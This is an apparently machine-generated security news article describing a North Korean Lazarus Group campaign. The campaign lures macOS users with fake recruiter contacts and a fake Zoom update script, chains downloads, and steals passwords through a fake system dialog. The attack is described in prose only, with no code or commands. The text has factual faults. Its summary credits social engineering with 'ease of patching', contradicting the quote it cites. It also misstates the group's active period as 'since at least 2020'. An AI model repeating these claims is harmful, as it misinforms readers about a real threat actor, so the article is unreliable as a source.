Ethical Hacking News
North Korea's Lazarus Group has launched a new campaign targeting macOS users using a combination of social engineering and fake software updates. The attackers are using a sophisticated attack chain that leverages legitimate Apple tools and mimics Apple naming conventions to disguise their illicit activity. By understanding the tactics used by this group, individuals can take necessary precautions to protect themselves from such attacks.
Summary: North Korea's Lazarus Group has launched a new campaign targeting macOS users using social engineering and fake software updates. The attackers use a sophisticated attack chain that leverages legitimate Apple tools and mimics Apple naming conventions to disguise their illicit activity.
The Lazarus Group (Sapphire Sleet) is targeting macOS users with a combination of social engineering and fake Zoom software updates. The attackers create fake recruiter profiles on social media to trick finance professionals into manually running malware. The attack uses a fake Zoom support meeting invite to download a malicious payload that launches a trusted Apple-signed process. The payload fetches and executes progressively more complex AppleScript payloads, using distinct user-agent strings for campaign tracking. The attackers use native Apple tools and naming conventions to disguise the illicit activity and obtain valid user credentials via a malicious application called systemupdate.app. Social engineering is an attractive tactic for attackers due to its low cost, ease of patching, and scalability.
North Korea's Lazarus Group, also known as Sapphire Sleet (APT38), has been making waves in the cyber security community with its latest heist targeting macOS users. According to Microsoft, the group is using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers.
The attacks begin with social engineering, where the crew creates fake recruiter profiles on social media and networking platforms like LinkedIn, and then reaches out to finance professionals with phony job opportunities. Once the victim has expressed interest, they are scheduled for a technical interview, which serves as the delivery mechanism for the malware.
But what makes this attack stand out is its use of a fake Zoom software update. The attackers send victims a fake Zoom support meeting invite, instructing them to download a file called Zoom SDK Update.scpt. This compiled AppleScript looks like a legitimate Zoom SDK update, complete with a large comment block of update instructions to make it appear authentic.
However, beneath the decoy content lies a malicious payload that launches a command that invokes the legitimate macOS softwareupdate binary - but with an invalid parameter. This essentially does nothing but launch a trusted Apple-signed process to make the software update look legitimate.
Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed.
The entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.
Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example, the host monitoring binary is called com.apple.cli, which helps mask the 5 MB Mach-O executable with an Apple-style naming convention.
The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility. When launched, this application displays a native macOS password dialog that closely resembles a legitimate system prompt, prompting the user to enter their password "to complete a software update."
This allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API.
In a statement, Sherrod DeGrippo, Microsoft global threat intelligence GM, explained that social engineering is an attractive tactic for attackers. "It's low-cost, hard to patch, and scales well," she said. "Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts. Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise."
The Lazarus Group has been in business since at least 2020, primarily targeting the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms.
This latest campaign highlights the sophistication and creativity of North Korean cyber threats. As the threat landscape continues to evolve, it's essential for users to remain vigilant and take necessary precautions to protect themselves from such attacks.
In conclusion, the Lazarus Group's use of social engineering and fake software updates to target macOS users serves as a stark reminder of the evolving nature of cyber threats. By understanding these tactics and taking proactive measures to secure their devices, individuals can significantly reduce the risk of falling victim to such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Koreas-Lazarus-Group-The-Sophisticated-Cyber-Threat-to-macOS-Users-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/04/16/north_korea_social_engineering_macos/
https://www.theregister.com/2026/04/16/north_korea_social_engineering_macos/
https://www.microsoft.com/en-us/security/blog/2026/04/16/dissecting-sapphire-sleets-macos-intrusion-from-lure-to-compromise/
https://www.picussecurity.com/resource/blog/lazarus-group-apt38-explained-timeline-ttps-and-major-attacks
https://attack.mitre.org/groups/G0082/
https://cybersecuritynews.com/lazarus-group-is-no-longer-consider-a-single-apt-group/
Published: Thu Apr 16 14:50:15 2026 by llama3.2 3B Q4_K_M
